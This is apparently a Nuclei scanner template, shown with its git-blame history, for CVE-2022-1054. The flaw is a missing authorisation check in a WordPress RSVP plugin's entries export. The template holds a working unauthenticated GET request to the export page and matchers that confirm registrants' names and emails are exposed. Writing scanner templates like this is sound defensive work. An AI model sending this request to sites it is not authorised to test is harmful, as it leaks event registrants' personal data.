nuclei-templates/cves/2022/CVE-2022-1054.yaml

id: CVE-2022-1054

info:
  name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export
  author: Akincibor
  severity: medium
  description: The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events
  reference:
    - https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2022-1054
    cwe-id: CWE-862
  tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'RSVP Status'
          - '"First Name"'
        condition: and

      - type: status
        status:
          - 200
Create CVE-2022-1054.yaml 2022-04-20 22:51:08 +00:00			`id: CVE-2022-1054`

			`info:`
			`name: RSVP and Event Management < 2.7.8 - Unauthenticated Entries Export`
			`author: Akincibor`
			`severity: medium`
CVE info update for CVE-2022-1054.yaml 2022-04-22 16:29:43 +00:00			`description: The RSVP and Event Management Plugin WordPress plugin before 2.7.8 does not have any authorisation checks when exporting its entries, and has the export function hooked to the init action. As a result, unauthenticated attackers could call it and retrieve PII such as first name, last name and email address of user registered for events`
Create CVE-2022-1054.yaml 2022-04-20 22:51:08 +00:00			`reference:`
			`- https://wpscan.com/vulnerability/95a5fad1-e823-4571-8640-19bf5436578d`
CVE info update for CVE-2022-1054.yaml 2022-04-22 16:29:43 +00:00			`classification:`
additional reference to cves templates (#4395) * additional reference to cves templates * Update CVE-2006-1681.yaml * Update CVE-2009-3318.yaml * Update CVE-2009-4223.yaml * Update CVE-2010-0942.yaml * Update CVE-2010-0944.yaml * Update CVE-2010-0972.yaml * Update CVE-2010-1304.yaml * Update CVE-2010-1308.yaml * Update CVE-2010-1313.yaml * Update CVE-2010-1461.yaml * Update CVE-2010-1470.yaml * Update CVE-2010-1471.yaml * Update CVE-2010-1472.yaml * Update CVE-2010-1474.yaml * removed duplicate references * misc fix Co-authored-by: Prince Chaddha <prince@projectdiscovery.io> Co-authored-by: Prince Chaddha <cyberbossprince@gmail.com> 2022-05-17 09:18:12 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N`
			`cvss-score: 5.3`
CVE info update for CVE-2022-1054.yaml 2022-04-22 16:29:43 +00:00			`cve-id: CVE-2022-1054`
			`cwe-id: CWE-862`
Auto Generated CVE annotations [Sat Aug 27 04:41:18 UTC 2022] :robot: 2022-08-27 04:41:18 +00:00			`tags: wordpress,cve,cve2022,wpscan,wp,wp-plugin`
Create CVE-2022-1054.yaml 2022-04-20 22:51:08 +00:00
			`requests:`
			`- method: GET`
			`path:`
			`- '{{BaseURL}}/wp-admin/admin.php?page=rsvp-admin-export'`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- 'RSVP Status'`
Update CVE-2022-1054.yaml 2022-04-22 13:27:48 +00:00			`- '"First Name"'`
			`condition: and`
Create CVE-2022-1054.yaml 2022-04-20 22:51:08 +00:00
			`- type: status`
			`status:`
			`- 200`